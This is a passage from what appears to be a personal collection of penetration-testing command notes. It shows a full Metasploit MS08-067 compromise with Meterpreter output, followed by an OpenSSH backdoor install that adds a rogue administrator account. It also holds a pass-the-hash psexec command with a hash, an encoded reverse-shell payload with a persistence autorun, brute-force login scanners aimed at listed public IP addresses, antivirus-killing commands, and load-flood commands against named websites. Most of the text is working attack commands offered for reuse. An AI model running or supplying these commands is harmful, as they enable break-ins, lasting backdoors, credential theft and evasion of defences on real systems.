3948msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
3949PAYLOAD => windows/meterpreter/bind_tcp
3950msf exploit(ms08_067_netapi) > set RHOST 192.168.1.40
3951RHOST => 192.168.1.40
3952msf exploit(ms08_067_netapi) > set TARGET 5
3953TARGET => 5
3954msf exploit(ms08_067_netapi) > show options
3955
3956... truncated output ...
3957Exploit target:
3958
3959Id Name
3960-- ----
39615 Windows 2003 SP0 Universal
3962
3963
3964msf exploit(ms08_067_netapi) > exploit
3965[*] Started bind handler
3966[*] Triggering the vulnerability...
3967[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
3968[*] Sending stage (2650 bytes)
3969[*] Sleeping before handling stage...
3970[*] Uploading DLL (75787 bytes)...
3971[*] Upload completed.
3972[*] Meterpreter session 1 opened (192.168.1.37:45633 -> 192.168.1.40:4444)
3973
3974meterpreter > sysinfo
3975Computer: SYSTEM-HJ28HHGL7N
3976OS : Windows .NET Server (Build 3790, ).
3977
3978
3979Uploading your OpenSSH Files
3980
3981meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH
3982meterpreter > lpwd
3983/mnt/PenTestTools/win32/OpenSSH
3984meterpreter > cd \
3985meterpreter > cd "Program Files"
3986meterpreter > mkdir openssh
3987Creating directory: openssh
3988meterpreter > cd openssh
3989meterpreter > pwd
3990C:\Program Files\openssh
3991meterpreter > upload -r . .
3992[*] uploading : ./uninstall.exe -> .\uninstall.exe
3993[*] uploaded : ./uninstall.exe -> .\uninstall.exe
3994[*] mirroring : ./bin -> .\bin
3995[*] uploading : ./bin/chmod.exe -> .\bin\chmod.exe
3996[*] uploaded : ./bin/chmod.exe -> .\bin\chmod.exe
3997[*] uploading : ./bin/chown.exe -> .\bin\chown.exe
3998[*] uploaded : ./bin/chown.exe -> .\bin\chown.exe
3999[*] uploading : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll
4000[*] uploaded : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll
4001.... lots of output truncated ....
4002
4003meterpreter > execute -f cmd.exe .i
4004Process 848 created.
4005Channel 66 created.
4006
4007
4008
4009Modifying the Registry and Adding Your Own Username
4010
4011Here, we import all of our registry keys, then add our own username making sure to put it into the administrators group. Then we create the passwd and group files that OpenSSH needs for authentication purposes.
4012
4013
4014Microsoft Windows [Version 5.2.3790]
4015(C) Copyright 1985-2003 Microsoft Corp.
4016C:\Program Files\openssh>whoami
4017whoami
4018nt authority\system
4019
4020C:\Program Files\openssh>reg import openssh.reg
4021reg import openssh.reg
4022The operation completed successfully.
4023
4024C:\Program Files\openssh>net user inet_p0wned gameover /add
4025net user inet_p0wned gameover /add
4026The command completed successfully.
4027
4028
4029C:\Program Files\openssh>net localgroup administrators inet_p0wned /add
4030net localgroup administrators inet_p0wned /add
4031The command completed successfully.
4032
4033
4034C:\Program Files\openssh>cd etc
4035cd etc
4036
4037C:\Program Files\openssh\etc>..\bin\mkpasswd -l >passwd
4038..\bin\mkpasswd -l >passwd
4039C:\Program Files\openssh\etc>..\bin\mkgroup -l >group
4040..\bin\mkgroup -l >group
4041
4042C:\Program Files\openssh\etc>sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto
4043sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto
4044[SC] CreateService SUCCESS
4045
4046
4047
4048Start the OpenSSH Service
4049
4050C:\Program Files\openssh\etc>sc start opensshd
4051sc start opensshd
4052SERVICE_NAME: opensshd
4053TYPE : 10 WIN32_OWN_PROCESS
4054STATE : 2 START_PENDING
4055(NOT_STOPPABLE, NOT_PAUSABLE,
4056IGNORES_SHUTDOWN))
4057WIN32_EXIT_CODE : 0 (0x0)
4058SERVICE_EXIT_CODE : 0 (0x0)
4059CHECKPOINT : 0x0
4060WAIT_HINT : 0x7d0
4061PID : 1916
4062FLAGS :
4063
4064C:\Program Files\openssh\etc>sc query opensshd
4065sc query opensshd
4066SERVICE_NAME: opensshd
4067TYPE : 10 WIN32_OWN_PROCESS
4068STATE : 4 RUNNING
4069(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN))
4070WIN32_EXIT_CODE : 0 (0x0)
4071SERVICE_EXIT_CODE : 0 (0x0)
4072CHECKPOINT : 0x0
4073WAIT_HINT : 0x0
4074
4075C:\Program Files\openssh\etc>netsh firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24
4076
4077The following command was not found: firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24**
4078
4079**Note: adding a port for the firewall is necessary if the firewall exists. If not, then you will get the command not found error message. It is a good idea to restrict the source networks so that you don.t leave a gaping opportunity while testing.
4080
4081C:\Program Files\openssh\etc>exit
4082exit
4083meterpreter > quit
4084
4085[*] Meterpreter session 1 closed.
4086msf exploit(ms08_067_netapi) > quit
4087
4088
4089
4090
4091
4092Now, lets go ahead and SSH into our Windows server to check if things worked!
4093
4094
4095root@localhost:~/framework-3.2]# ssh inet_p0wned@192.168.1.40
4096The authenticity of host '192.168.1.40 (192.168.1.40)' can't be established.
4097RSA key fingerprint is ab:c8:bf:9f:b2:38:32:1d:6f:2b:34:a5:d0:99:dc:49.
4098Are you sure you want to continue connecting (yes/no)? yes
4099Warning: Permanently added '192.168.1.40' (RSA) to the list of known hosts.
4100
4101OpenSSH for Windows. Welcome aboard!
4102
4103inet_p0wned@192.168.1.40's password:
4104Could not chdir to home directory /home/inet_p0wned: No such file or directory
4105Microsoft Windows [Version 5.2.3790]
4106(C) Copyright 1985-2003 Microsoft Corp.
4107C:\Program Files\OpenSSH>
4108C:\Program Files\OpenSSH>whoami
4109system-hj28hhgl7n\inet_p0wned
4110
4111C:\Program Files\OpenSSH>exit
4112Connection to 192.168.1.40 closed.
4113[root@localhost framework-3.2]#
4114
4115
4116Cleaning up
4117
4118To clean up everything when you are finished, you need to delete the OpenSSH service, delete the registry keys and remove all of the relevant files. The following recipe should work reasonably well from a command shell. Remember that you cannot be using OpenSSH when deleting the service! So, you may need to exploit again with shell code before removing it.
4119
4120C:\> SC STOP opensshd
4121C:\> SC DELETE opensshd
4122C:\> REG DELETE .HKLM\SOFTWARE\Cygnus Solutions. /f /va
4123C:\> REG DELETE .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. /f /va
4124C:\> REG DELETE .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. /f /va
4125
4126C:\> CD "\Program Files"
4127C:\Program Files> RMDIR /Q /S opensshd
4128C:\Program Files> NETSH FIREWALL DELETE PORT TCP 22
4129C:\Program Files> NET USER inet_p0wned /DELETE # pivot
4130http://www.offensive-security.com/metasploit-unleashed/Pivoting
4131
4132use exploit/windows/smb/psexec
4133set RHOST 10.1.13.2
4134set SMBUser Administrator
4135set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
4136set PAYLOAD windows/meterpreter/bind_tcp
4137exploit
4138
4139
4140
4141# make exe
4142./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.55 LPORT=443 R | ./msfencode -t exe -c 5 -o /tmp/bob.exe
4143
4144# attacker listen
4145use exploit/multi/handler
4146set PAYLOAD windows/meterpreter/reverse_tcp
4147set LHOST 192.168.6.55
4148set LPORT 443
4149set ExitOnSession false
4150# set AutoRunScript pathto script you want to autorun after exploit is run
4151set AutoRunScript persistence -r 192.168.6.55 -p 443 -A -X -i 30
4152
4153exploit -j -z
4154
4155
4156# armatage
4157apt-get install mysql-server -y
4158/etc/init.d/mysql start
4159
4160mysqladmin -u root -ppassword password toor
4161
4162
4163/pentest/exploits/framework/msfrpcd -f -U msf -P test -t Basic
4164
4165
4166
4167# armatage
4168
4169apt-get install -y postgresql
4170
4171apt-get install libpq-dev -y
4172
4173gem install postgres
4174
4175/etc/init.d/postgresql start
4176
4177
4178su -
4179su - postgres
4180
4181
4182createuser msf_user -P
4183createdb --owner=msf_user msf
4184
4185
4186
4187/pentest/exploits/framework/msfrpcd -f -U msf -P msf -t Basic
4188/pentest/exploits/framework/armitage
4189
4190
4191
4192
4193net user newuserhere PASSWORDHERE /add
4194net localgroup administrators newuserhere /add
4195
4196
4197"c:\program files\nmap\nmap.exe" -vvv -n -p 1527,3200,3201,3300,3600,8000,8100,8101,40000-40005,50013,50113 -A 192.168.56,14,6,7,8,9.1-255 -oA sap
4198
4199 ----
4200
4201
4202
4203
4204# ssh
4205use auxiliary/scanner/ssh/ssh_login
4206
4207#set RHOSTS_FILE "C:/backup/wordlist/targests.txt"
4208
4209
4210set RHOSTS 4.59.139.135 4.59.139.136 4.59.139.140 63.116.61.25 63.116.61.26 63.116.61.34
4211# set USER_FILE "C:/backup/wordlist/password_large.txt"
4212set USERPASS_FILE "C:/backup/wordlist/root_userpass.txt"
4213set VERBOSE true
4214set STOP_ON_SUCCESS true
4215set BRUTEFORCE_SPEED 5
4216# set this to the number of host
4217set THREADS 6
4218
4219run
4220
4221
4222
4223use auxiliary/gather/dns_enum
4224set DOMAIN domain.com
4225run
4226
4227
4228#smb
4229
4230use auxiliary/scanner/smb/smb_login
4231
4232set RHOSTS file://192.168.8.39
4233set RHOSTS 127.0.0.1
4234
4235set USER_FILE "C:/wordlist/users.txt"
4236set PASS_FILE "C:/wordlist/2.txt"
4237set VERBOSE false
4238# set to number of host scanning .
4239set THREADS 16
4240
4241set STOP_ON_SUCCESS true
4242set VERBOSE true
4243set BLANK_PASSWORDS false
4244
4245
4246# http
4247
4248use auxiliary/scanner/http/http_login
4249set AUTH_URI /folder?dcPath=ha-datacenter
4250set RHOSTS 127.0.0.1 127.0.0.1 127.0.0.1
4251set VERBOSE true
4252run
4253
4254
4255
4256
4257back
4258
4259# telnet
4260use auxiliary/scanner/telnet/telnet_login
4261set RHOSTS 127.0.0.1,49,50
4262
4263set PASS_FILE "C:/wordlist/password_small.txt"
4264set THREADS 254
4265run
4266
4267
4268
4269back
4270
4271
4272# mssql
4273use auxiliary/scanner/mssql/mssql_login
4274set RHOSTS 127.0.0.1
4275set PASS_FILE "C:/wordlist/password_small.txt"
4276set USERNAME sa
4277set VERBOSE false
4278run
4279
4280
4281back
4282
4283
4284
4285#ftp
4286use auxiliary/scanner/ftp/ftp_login
4287set RHOSTS 127.0.0.1
4288set PASS_FILE /home/administrator/alcoa/alcoa_small.txt
4289set USER_FILE /home/administrator/alcoa/alcoa_small.txt
4290set BRUTEFORCE_SPEED 1
4291run
4292
4293
4294
4295#snmp
4296use auxiliary/scanner/snmp/snmp_login
4297set RHOSTS 127.0.0.1
4298set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
4299set VERBOSE false
4300
4301run
4302
4303
4304
4305nmap --script=smtp-open-relay.nse -p 25 -iL 25 -n
4306
4307
4308./sfuzz -T O -f sfuzz-sample/basic.http -S 50.74.10.218 -p 179
4309
4310
4311# onlt works for Delegation Tokens
4312list_tokens -u
4313impersonate_token ORACLE-ENT\\Administrator
4314
4315
4316# after hijack incognito
4317use auxiliary/server/capture/smb
4318
4319# ubuntu autopwn
4320apt-get install ruby1.8-dev libpq-dev postgresql -y
4321gem install postgres
4322
4323
4324# download autopwn .
4325cd /pentest/exploits/framework/plugins/
4326wget http://rmccurdy.com/scripts/db_autopwn.rb
4327cd ..
4328
4329
4330
4331sudo -u postgres psql
4332\password postgres
4333\q
4334
4335
4336sudo -u postgres createdb msf
4337
4338./msfconsole
4339
4340db_driver
4341db_driver postgresql
4342db_connect postgres:postgres@127.0.0.1/msf
4343db_nmap 123.123.123.123 -v -v -v -v
4344load db_autopwn
4345db_autpown -p -t -e
4346
4347
4348# ssh logins
4349use auxiliary/scanner/ssh/ssh_login
4350set RHOSTS 192.168.1.1-255
4351set USER_FILE "C:/wordlist/password_small.txt"
4352run
4353
4354
4355
4356back
4357
4358#smb
4359use auxiliary/scanner/smb/smb_login
4360set RHOSTS 127.0.0.1
4361set SMBUser Administrator
4362set PASS_FILE "C:/wordlist/password_small.txt"
4363set VERBOSE false
4364set THREADS 16
4365run
4366
4367
4368
4369back
4370
4371# telnet
4372use auxiliary/scanner/telnet/telnet_login
4373set RHOSTS 127.0.0.1
4374set PASS_FILE "C:/wordlist/password_small.txt"
4375set THREADS 254
4376run
4377
4378
4379
4380back
4381
4382
4383# mssql
4384use auxiliary/scanner/mssql/mssql_login
4385set RHOSTS 127.0.0.1
4386set PASS_FILE "C:/wordlist/password_small.txt"
4387set USERNAME sa
4388run
4389
4390
4391back
4392
4393
4394
4395#ftp
4396use auxiliary/scanner/ftp/ftp_login
4397set RHOSTS 127.0.0.1
4398set PASS_FILE "C:/wordlist/password_small.txt"
4399run
4400
4401
4402
4403#snmp
4404use auxiliary/scanner/snmp/snmp_login
4405set RHOSTS 127.0.0.1
4406set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
4407run
4408
4409
4410
4411
4412User Summary
4413
4414Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
4415Example Usage
4416
4417nmap -sV -sC <target>
4418
4419db_driver postgresql
4420db_connect postgres:"msf3:"32a771f6"@127.0.0.1:7175/msf3
4421
4422http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=7558 Microsoft Baseline Security Analyzer 2.2 (for IT Professionals)
4423
4424.a/gxfr.py rmccurdy.com --dns-lookup -v -t 10
4425
4426
4427http stress test
4428.- HTTPS Support
4429- 1000 simultaneous connections (each one with a different user/password)
4430- Ability to record 2 or more application forms in order to test very specific application flows..
4431
4432In order to answer your question, there.re some tools like:
4433
4434Tool 1- httperf
4435
4436More examples that I used before.
4437
4438httperf --hog --server HOST --num-conn 1000 --ra 100 --timeout 5
4439httperf --hog --server 192.168.1.3 --num-conn 1000 --ra 100 --timeout 5
4440httperf --hog --server=192.168.1.3 --wsess=10,5,2 --rate 1 --timeout 5
4441httperf --hog --server=www --wsess=10,5,2 --rate=1 --timeout=5 --ssl
4442httperf --hog --server=bankinghome.es/apl/donativos/index_ca.html --wsess=10,5,2 --rate=1 --timeout=5 --ssl --ssl-ciphers=EXP-RC4-MD5:EXP-RC2-CBC-MD5 --ssl-no-reuse --http-version=1.0
4443httperf --hog --server=17.148.71.129/index.html --wsess=10,5,2 --rate=1 --timeout=5 --ssl --ssl-ciphers=EXP-RC4-MD5:EXP-RC2-CBC-MD5 --ssl-no-reuse --http-version=1.0
4444httperf --hog --server=http://17.148.71.129/index.html --wsess=10,5,2 --rate=1 --timeout=5 --ssl --ssl-ciphers=EXP-RC4-MD5:EXP-RC2-CBC-MD5 --ssl-no-reuse --http-version=1.0
4445
4446Tool 2- fakeconnect
4447
4448fakeconnect -s SOURCE -d HOST -p PORT
4449
4450Tool 3- Apache benchmarking tool (accept POST)
4451
4452ab -n 100 -c 4 -p test.jpg http://localhost/
4453(http://httpd.apache.org/docs/2.0/programs/ab.html)
4454
4455Tool 4- Curl-loader (it rocks, very customizable)
4456
4457http://curl-loader.sourceforge.net/
4458
4459
4460And running hundreds and thousands of clients..., please, do not forget:
4461
44621- To increase limit of descriptors (sockets) by running e.g.
4463
4464#ulimit -n 10000;
4465
44662- Optionally, to set reuse of sockets in time-wait state, etc.., by setting:
4467
4468#echo 1 > /proc/sys/net/ipv4/tcp_tw_recycle and/or
4469#echo 1 > /proc/sys/net/ipv4/tcp_tw_reuse;
4470#echo 1 > /proc/sys/net/ipv4/tcp_moderate_rcvbuf
4471#echo 108544 > /proc/sys/net/core/wmem_max
4472#echo 108544 > /proc/sys/net/core/rmem_max
4473#echo "4096 87380 4194304" > /proc/sys/net/ipv4/tcp_rmem
4474#echo "4096 16384 4194304" > /proc/sys/net/ipv4/tcp_wmem
4475
4476Additional info:
4477
4478http://ltp.sourceforge.net/tooltable.php
4479
4480Hope that help you.
4481
4482
4483
4484==========
4485
4486
4487random file raname rename random file
4488IFS=$'\n';for fname in `ls`; do mv "$fname" $RANDOM$RANDOM ;done
4489
4490
4491grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' ips | sort | uniq
4492
4493
4494catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
4495catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
4496catchme.exe -O "c:\Program Files\Kaspersky\avp.exe"
4497reboot
4498still looking into it .. can't kill it from memory yet I can delete the file
4499
4500
4501
4502# file size search
4503FOR /R C:\ %i in (*) do @if %~zi gtr 10000000 echo %i %~zi
4504
4505# screen cron
4506@reboot /usr/bin/screen -fa -d -m -S torrent /usr/bin/rtorrent
4507
4508
4509# netstat with pid
4510for /f "tokens=1,2,3,7 delims=: " %a in ('netstat -nao ^| find ^"LISTENING^" ^| find /v ^"::^"') do @(for /f "tokens=1,*" %n in ('"wmic process where processId=%d get caption,executablepath | find ".""') do @echo Protocol=%a, IP=%b, Port=%c, PID=%d, Name=%n, Path=%o)
4511
4512
4513# CSV file size,file
4514for /r c:\ %i in (*) do @echo %~zi, %i
4515
4516# md5 check but in linux style
4517md5 * | awk '{print $4,$2}' | sed 's/ (/ \*/g' | sed 's/)//g'
4518
4519
4520
4521#################
4522# see ./fu_ripp.txt for ripped fu the size was getting out of hand ..
4523#################